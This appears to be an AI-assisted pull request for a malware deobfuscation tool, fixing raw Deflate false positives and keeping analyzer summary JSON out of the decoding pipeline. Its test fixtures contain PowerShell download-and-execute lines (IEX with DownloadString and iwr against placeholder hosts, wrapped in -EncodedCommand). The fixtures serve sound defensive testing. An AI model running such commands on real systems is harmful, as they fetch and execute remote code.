### PR TITLE
Fix RawDeflate false positives and stop decoding analyzer metadata

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -2,6 +2,18 @@
 
 ## Unreleased
 
+Decoder and artifact-graph correctness:
+
+- Require raw Deflate input to be exactly one complete DEFLATE stream
+  (reject trailing `unused_data`), so ordinary text whose first bytes form a
+  coincidental stream is no longer reported as a decode.
+- Stop feeding analyzer-generated metadata artifacts (summary/metadata JSON)
+  back through decoders and analyzers; they remain in the graph and still
+  contribute to IOC extraction.
+- Reserve analyzer summary names so an extracted file with the same
+  sanitized name is deterministically renamed instead of shadowing the
+  summary artifact.
+
 Engine coverage, isolation, and response workflow:
 
 - Add ASCII85, Base58, Base91, raw Deflate, PowerShell EncodedCommand,

--- a/tests/test_advanced_decoders.py
+++ b/tests/test_advanced_decoders.py
@@ -31,6 +31,29 @@ def test_raw_deflate_round_trip_and_output_bound():
     assert RawDeflateDecoder(max_output=8).decode(encoded) == (encoded, False)
 
 
+def test_raw_deflate_rejects_input_that_is_not_one_complete_stream():
+    decoder = RawDeflateDecoder()
+    # Ordinary JSON text whose first bytes coincidentally form a complete
+    # DEFLATE stream must not "decode": the remaining bytes land in
+    # unused_data and prove the match was accidental.
+    metadata = (
+        b'{\n  "analyzer": "script",\n  "deobfuscated_artifacts": [\n'
+        b'    "powershell_decoded.txt"\n  ],\n  "execution_performed": false,\n'
+        b'  "features": [\n    "obfuscation"\n  ],\n  "languages": [\n'
+        b'    "powershell"\n  ]\n}'
+    )
+    assert decoder.can_decode(metadata) is False
+    assert decoder.decode(metadata) == (metadata, False)
+    # A genuine stream followed by trailing bytes is rejected for the same
+    # reason, while the bare stream still decodes.
+    compressor = zlib.compressobj(wbits=-zlib.MAX_WBITS)
+    encoded = compressor.compress(b"payload http://deflate.example/b")
+    encoded += compressor.flush()
+    assert decoder.decode(encoded) == (b"payload http://deflate.example/b", True)
+    padded = encoded + b"trailing"
+    assert decoder.decode(padded) == (padded, False)
+
+
 def test_powershell_encoded_command_extracts_utf16le():
     command = "IEX (iwr 'http://powershell.example/stage.ps1')"
     encoded = base64.b64encode(command.encode("utf-16-le")).decode("ascii")

--- a/tests/test_structured_analyzers.py
+++ b/tests/test_structured_analyzers.py
@@ -112,6 +112,48 @@ def test_optional_archive_recognition_fails_closed_without_valid_payload():
     assert analyzer.analyze(fake_cab) == []
 
 
+def test_analyzer_metadata_artifacts_are_terminal_but_still_feed_iocs():
+    command = (
+        "IEX (New-Object Net.WebClient).DownloadString('http://meta.example/a.ps1')"
+    )
+    encoded = base64.b64encode(command.encode("utf-16-le"))
+    script = b"powershell -nop -EncodedCommand " + encoded
+    report = TitanEngine().run_analysis(script)
+    nodes = report["nodes"]
+    summaries = [
+        node for node in nodes if node.get("artifact_name") == "script_summary.json"
+    ]
+    assert summaries
+    summary = summaries[0]
+    # The analyzer-authored summary is recorded but never fed back through
+    # decoders or analyzers, so it stays a childless ANALYZE-terminal node.
+    assert summary["method"] == "ANALYZE"
+    assert summary["analysis_state"] == "terminal"
+    assert "metadata" in summary["termination_reason"]
+    assert all(node.get("parent") != summary["id"] for node in nodes)
+    # Its preview still contributes to report-level IOC extraction.
+    assert "http://meta.example/a.ps1" in report["iocs"]["urls"]
+
+
+def test_email_attachment_cannot_shadow_the_summary_artifact():
+    message = (
+        b"From: sender@example.org\r\n"
+        b"To: analyst@example.org\r\n"
+        b"Subject: Shadow\r\n"
+        b"MIME-Version: 1.0\r\n"
+        b"Content-Type: multipart/mixed; boundary=x\r\n\r\n"
+        b"--x\r\nContent-Type: application/octet-stream\r\n"
+        b"Content-Disposition: attachment; filename=summary.json\r\n\r\n"
+        b'{"not": "the analyzer summary"}\r\n--x--\r\n'
+    )
+    artifacts = EmailAnalyzer().analyze(message)
+    names = [name for name, _ in artifacts]
+    assert names.count("email_summary.json") == 1
+    summary = json.loads(dict(artifacts)["email_summary.json"])
+    assert summary["analyzer"] == "email"
+    assert "email_summary_2.json" in names
+
+
 def test_structured_analyzers_are_registered_deterministically():
     names = [analyzer.name for analyzer in TitanEngine().analyzers]
     assert names == sorted(names)

--- a/titan_decoder/core/analyzers/base.py
+++ b/titan_decoder/core/analyzers/base.py
@@ -28,6 +28,15 @@ class Analyzer(ABC):
         """Name of the analyzer."""
         pass
 
+    @property
+    def metadata_artifact_names(self) -> frozenset:
+        """Artifact names this analyzer generates itself (summaries, parsed
+        metadata) rather than extracts from the input. The engine records
+        these nodes for IOC extraction and reporting but never feeds them
+        back through decoders, where analyzer-authored JSON can only ever
+        produce false-positive decode nodes."""
+        return frozenset()
+
 
 class ZipAnalyzer(Analyzer):
     """ZIP file analyzer with comprehensive safety checks.
@@ -295,6 +304,10 @@ class TarAnalyzer(Analyzer):
 class PEAnalyzer(Analyzer):
     """PE (Portable Executable) file metadata analyzer."""
 
+    @property
+    def metadata_artifact_names(self) -> frozenset:
+        return frozenset({"pe_metadata.json"})
+
     def can_analyze(self, data: bytes) -> bool:
         """Check if data looks like a PE file."""
         if len(data) < 64:
@@ -558,6 +571,10 @@ class PEAnalyzer(Analyzer):
 
 class ELFAnalyzer(Analyzer):
     """ELF (Executable and Linkable Format) file metadata analyzer."""
+
+    @property
+    def metadata_artifact_names(self) -> frozenset:
+        return frozenset({"elf_metadata.json"})
 
     def can_analyze(self, data: bytes) -> bool:
         """Check if data looks like an ELF file."""

--- a/titan_decoder/core/analyzers/structured.py
+++ b/titan_decoder/core/analyzers/structured.py
@@ -70,6 +70,10 @@ class EmailAnalyzer(Analyzer):
     def name(self) -> str:
         return "Email"
 
+    @property
+    def metadata_artifact_names(self) -> frozenset:
+        return frozenset({"email_summary.json"})
+
     def can_analyze(self, data: bytes) -> bool:
         header = data[: 64 * 1024]
         return bool(
@@ -85,6 +89,9 @@ class EmailAnalyzer(Analyzer):
             return []
 
         collector = _Collector(self.max_artifacts, self.max_total, self.max_item)
+        # Reserve the summary name so an attachment that sanitizes to the same
+        # string is renamed by the collector instead of colliding with it.
+        collector.names.add("email_summary.json")
         summary: dict[str, Any] = {
             "analyzer": "email",
             "subject": str(message.get("subject", ""))[:4096],
@@ -162,6 +169,10 @@ class OfficeAnalyzer(Analyzer):
     def name(self) -> str:
         return "OfficeOOXML"
 
+    @property
+    def metadata_artifact_names(self) -> frozenset:
+        return frozenset({"office_summary.json"})
+
     def can_analyze(self, data: bytes) -> bool:
         if not data.startswith(b"PK\x03\x04"):
             return False
@@ -197,6 +208,9 @@ class OfficeAnalyzer(Analyzer):
         if not self.can_analyze(data):
             return []
         collector = _Collector(self.max_artifacts, self.max_total, self.max_item)
+        # Reserve the summary name so an archive member that sanitizes to the
+        # same string is renamed by the collector instead of colliding with it.
+        collector.names.add("office_summary.json")
         summary: dict[str, Any] = {
             "analyzer": "office_ooxml",
             "package_type": "unknown",
@@ -313,6 +327,10 @@ class ScriptAnalyzer(Analyzer):
     def name(self) -> str:
         return "Script"
 
+    @property
+    def metadata_artifact_names(self) -> frozenset:
+        return frozenset({"script_summary.json"})
+
     def _languages(self, data: bytes) -> list[str]:
         lowered = data[: self.max_item].lower()
         return sorted(
@@ -376,6 +394,10 @@ class LnkAnalyzer(Analyzer):
     @property
     def name(self) -> str:
         return "WindowsLNK"
+
+    @property
+    def metadata_artifact_names(self) -> frozenset:
+        return frozenset({"lnk_metadata.json"})
 
     def can_analyze(self, data: bytes) -> bool:
         return (

--- a/titan_decoder/core/engine.py
+++ b/titan_decoder/core/engine.py
@@ -418,6 +418,7 @@ class TitanEngine:
         depth: int = 0,
         is_decoded_content: bool = False,
         artifact_name: Optional[str] = None,
+        is_analyzer_metadata: bool = False,
     ) -> None:
         """Recursively analyze a blob of data with intelligent scoring and pruning."""
         if self._cancelled():
@@ -499,6 +500,18 @@ class TitanEngine:
             return
         self._seen_hashes.add(node.sha256)
 
+        # Analyzer-generated metadata (summaries, parsed headers) is authored
+        # by Titan itself, not recovered from the input. It stays in the graph
+        # so previews feed IOC extraction and reporting, but running decoders
+        # or analyzers over it can only manufacture false-positive nodes.
+        if is_analyzer_metadata:
+            node.analysis_state = "terminal"
+            node.termination_reason = (
+                "Analyzer-generated metadata artifact; not fed back through "
+                "decoders or analyzers."
+            )
+            return
+
         # Smart detection: Check if we should enable any off-by-default decoders
         detected_decoders = self.smart_detector.detect_format(data)
         if detected_decoders:
@@ -572,6 +585,9 @@ class TitanEngine:
                         # never score-pruned (is_decoded_content=True); the
                         # depth limit and global node cap inside analyze_blob
                         # are what bound the fan-out.
+                        metadata_names = getattr(
+                            analyzer, "metadata_artifact_names", frozenset()
+                        )
                         for name, content in extracted:
                             self.analyze_blob(
                                 content,
@@ -579,6 +595,7 @@ class TitanEngine:
                                 depth + 1,
                                 is_decoded_content=True,
                                 artifact_name=name,
+                                is_analyzer_metadata=name in metadata_names,
                             )
 
                         if self.include_decision_trace:

--- a/titan_decoder/decoders/advanced.py
+++ b/titan_decoder/decoders/advanced.py
@@ -93,9 +93,14 @@ class RawDeflateDecoder(Decoder):
         try:
             decoder = zlib.decompressobj(-zlib.MAX_WBITS)
             output = decoder.decompress(data, self.max_output + 1)
+            # Raw DEFLATE has no header, so the only defensible signal is that
+            # the entire input is one complete stream: bytes left after EOF
+            # land in unused_data and mean the "stream" was a coincidental
+            # prefix (ordinary text such as "{\n ..." decodes this way).
             if (
                 len(output) > self.max_output
                 or decoder.unconsumed_tail
+                or decoder.unused_data
                 or not decoder.eof
             ):
                 return None


### PR DESCRIPTION
## Summary

Fixes two artifact-graph correctness issues found while reviewing the engine expansion (#132), plus a related name-shadowing hardening:

- **RawDeflate false positives**: `RawDeflateDecoder` only checked `unconsumed_tail` and `eof`, but bytes remaining after end-of-stream land in zlib's `unused_data`. Any input whose first bytes coincidentally formed a complete DEFLATE stream "decoded" — e.g. the Script analyzer's own summary JSON decoded to the single junk byte `\xe5`, adding a phantom `DECODE_RawDeflate` node to every affected graph. The decoder now requires the entire input to be exactly one complete stream.
- **Analyzer metadata no longer re-enters the pipeline**: summary/metadata artifacts (`script_summary.json`, `email_summary.json`, `office_summary.json`, `lnk_metadata.json`, `pe_metadata.json`, `elf_metadata.json`) are authored by Titan itself, so feeding them back through decoders/analyzers can only manufacture false-positive nodes. Analyzers now declare these names via a new `Analyzer.metadata_artifact_names` property (default empty, so plugin analyzers are unaffected), and the engine records those nodes as terminal while their previews still feed report-level IOC extraction.
- **Summary-name shadowing**: an extracted file whose sanitized name collides with a summary name (e.g. an email attachment literally named `summary.json` becomes `email_summary.json`) could shadow the metadata artifact and be skipped from decoding. The Email and Office collectors now reserve the summary name up front so real extracted files are deterministically renamed (`email_summary_2.json`).

Behavior is otherwise unchanged: the PowerShell `-EncodedCommand` end-to-end sample still yields the same IOCs, TITAN-003 detection, and MEDIUM risk — just with a clean 3-node graph instead of 4 nodes including the junk decode.

## Checklist

- [x] I am not including real incident evidence, logs, browser history databases, or other sensitive data.
- [x] I am not including secrets (API keys/tokens/passwords).
- [x] I ran tests locally (`pytest -q`).
- [x] I updated docs if flags/output contracts changed (CHANGELOG entry added; no flag or schema changes).
- [x] Changes are dependency-light and preserve offline-first, deterministic behavior.

## Testing

- Command(s) run:

```bash
pytest -q        # 747 passed, 1 skipped
ruff check .     # clean
ruff format --check .
mypy titan_decoder  # no issues in 111 files
```

- Notes: added three regression tests — DEFLATE trailing-byte rejection (including the exact JSON-metadata reproduction), metadata nodes terminal-but-IOC-contributing, and attachment-cannot-shadow-summary.

## Screenshots / Output (optional)

Node graph for `powershell -nop -EncodedCommand <base64>` before → after:

```
before: ANALYZE_Script → [script_summary.json → DECODE_RawDeflate → 1-byte junk node], [powershell_decoded.txt]
after:  ANALYZE_Script → [script_summary.json (terminal metadata)], [powershell_decoded.txt]
```

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01EYkQaMWZqLp4GKPZ7XGVFB

---
_Generated by [Claude Code](https://claude.ai/code/session_01EYkQaMWZqLp4GKPZ7XGVFB)_